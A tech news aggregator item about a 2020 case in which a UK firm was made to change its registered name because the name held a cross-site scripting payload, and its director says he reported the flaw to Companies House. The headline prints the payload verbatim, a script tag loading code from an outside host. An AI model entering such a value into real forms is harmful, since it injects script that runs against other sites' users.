Techly NewsGet the app

Get the latest tech news

Company named "><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD" forced to change it (2020)


Software firm’s director thought name using HTML would be ‘fun and playful’

He now says he didn’t realise that Companies House was actually vulnerable to the extremely simple technique he used, known as “cross-site scripting”, which allows an attacker to run code from one website on another. “When I discovered there were some minor problems, I contacted Companies House and the National Cyber Security Centre immediately, and didn’t disclose the issue to anyone else.” He did not realise it would be an issue, he said, because characters including > and “ are explicitly allowed as company names, which suggested that the agency had put security measures in place to prevent such attacks.

Get the Android app

Or read this on Hacker News

Read more on:

Photo of UK Company

UK Company

Photo of LTD

LTD

Photo of SCRIPT SRC

SCRIPT SRC

« Amazon’s Grocery Chief Is Departing After Overseeing Reboot
Tesla's Cybertruck is outselling almost every other EV in the U »